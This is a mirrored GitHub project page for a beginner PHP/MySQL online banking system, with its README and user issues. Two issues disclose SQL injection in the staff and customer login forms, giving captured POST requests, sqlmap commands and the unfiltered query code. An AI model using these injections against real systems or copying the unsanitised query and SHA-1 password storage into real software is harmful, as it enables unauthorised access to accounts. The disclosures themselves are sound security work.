GithubHelp home page GithubHelp logo

online-banking-system's Introduction

Disclaimer

Some people have downloaded this project and are using it for phishing purposes after modifying the source code. The original project has nothing to do with phishing or any other malicious purpose. Any loss of data or unauthorized access which happened because of such phishing kits would not be my responsibility as that's not my original code. Strict legal action would be taken if someone is found modifying it and using it for any unethical purpose.

Online-Banking-system

Online Banking System in PHP & MySQL.

The project’s primary goals consist of:

A robust and effective web based online banking system.

Extending functionality without compromising the security.

Personal banking services that gives you complete control over all your banking demands online.

Simple and easy user interface to work with.

Online Banking features:

Registration for online banking by Admin.

Adding Beneficiary account by customer.

Transferring amount to the beneficiary added by customer.

Staff must approve for beneficiary activation before it can be used for transferring funds.

Customer gets to know his last login date and time each time he logs in.

Customer can check last 10 transactions made with their account.

Customer can check their account statement within a date range.

Customer can request for ATM and Cheque Book.

Staff will approve requests for ATM card and cheque book.

Admin can add/edit/delete customer as well as staff.

All three of them(customer, staff & admin) can change their password.

Staff and Admin Login pages are hidden from customer for security purpose.

Security:

Each and every input is passed through mysql_real_escape_string() to remove special characters from the string so that user can’t submit arbitrary input. It protects from attacks like Sql Injection and Cross Site Scripting(XSS).

Passwords are encrypted with SHA- 1 hashing algorithm and then stored in database.

Passwords are stored as encrypted hashes with an additional random salt for added security.

Note: If we talk about security,above mentioned points would provide no security at all but it will work for beginners. Being into web app pentesting,I very well know this project will not be considered secure. It needs atleast a more effective filtering mechanism, better hashing algorithm, a better salting procedure for storing passwords and some other things too.

Database:

The database contains customer, staff & admin tables.

Each customer has its own virtual passbook linked with its account number.

Staff, customer and, admin have their details and password in their respective tables with all the details.

A separate table for beneficiary is included in the database.

A table for cheque book and ATM requests is included.

This project is divided into three hierarchical parts:

The index page for the customer login.

A hidden staff login page.

A hidden admin login page.

Usage:

1.Install XAMPP or something similar.

2.Copy all the files to c:/xampp/htdocs/banking/

3.Create a db named as 'bnak_db' and import the bank_db.sql from phpMyAdmin.

4.change the password in _inc/dbconn.php file accordingly.

5.visit localhost/banking (customer index page)

6.visit localhost/banking/adminlogin.php (admin login)

7.visit localhost/banking/staff_login.php (staff login)

Note: The customer passwords are hashed and stored in the database. You will not be able to see it. The password is 'rash' for almost all the customers,just in case if you want to login with the pre added customer.

online-banking-system's People

Contributors

g33kyrash avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

online-banking-system's Issues

Can I use this system?

Hey,
Sorry for opening an issue but I found no other way to contact you.
I'd like to use the system for a micronational bank.
You can read about micronationalism over here: micronations.wiki
I promise not to use it for any illegal purposes and/or in any illegal way.
If you'd like me to present details as a guarantee, leave your mail and I will.

Thanks in advance,
elBandoler.

MaweBank

Dedicated to Sir. Mawe Olumuyiwa Awe
My Honorable

unable to login

there is no responce for login button for customer and staff please fix it

There is a SQL injection vulnerability in staff_login.php

poc

First visit http://ip:port/staff_login.php
image
Enter any user and password,Use burp to capture packets
image
Modify the data package as follows, save as data.txt:

POST /staff_login.php HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: http://localhost:8888
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

uname=*&pwd=admin&submitBtn=Log+In

execute SQLmap
python sqlmap.py -r data.txt --batch --current-user
image

analysis

file staff_login.php line 43

    $username=$_REQUEST['uname'];
    $password=$_REQUEST['pwd'];
    $sql="SELECT email,pwd FROM staff WHERE email='$username' AND pwd='$password'";

without any filter for username and password

Unable to login using admin / customer login

Hi,

After full configuration as instructed, the admin login is not happening as it was supposed to. I even changed the password from admin to admin123.

I have checked the database and its configuration in the _inc folder, and the same is uploaded in the server as latest configuration file.

This is the same case with customer login too. When I login using the customer credentials, the page redirects and the page is blank. On the admin page, the page doesn't react after entering the username and password, no redirect, nothing.

Any help in this regard? I will recheck the db, but i feel its the code, not the db!

Thanks in advance

There is a SQL injection vulnerability in index.php

First visit http://IP:port/index.php
image

Enter any user and password,Use burp to capture packets
1

Modify the data package as follows, save as data.txt:

POST /index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://127.0.0.1/index.php
Cookie: PHPSESSID=r8l3df9nrcqh7aluf2m9lb6ah0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 40

uname=*&pwd=dddddddd&submitBtn=Log+In

execute SQLmap

sqlmap -r data.txt --batch

image

bank balances

how about including balances?
like current amount in account.

Error Message upon login

This is the error message i receive when trying to login is this suppose to happen? please help

Fatal error: Uncaught Error: Call to undefined function mysql_connect() in C:\xampp\htdocs\banking_inc\dbconn.php:6 Stack trace: #0 C:\xampp\htdocs\banking\index.php(15): include() #1 {main} thrown in C:\xampp\htdocs\banking_inc\dbconn.php on line 6

I'm not able to login

I tried to login to admin using admin/admin and it's telling me admin_homepage cannot be found?
Also what are the usernames of the preexisting users and i cannot see that in the database.

Thanks

Add Beneficiary issue

please can you guide me on this script, i cannot add beneficiary what is the problem???

hosting Server

I installed this on a hosting server thought cpanel, doesn't seem to be working right. i can't login to any accounts or admin

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.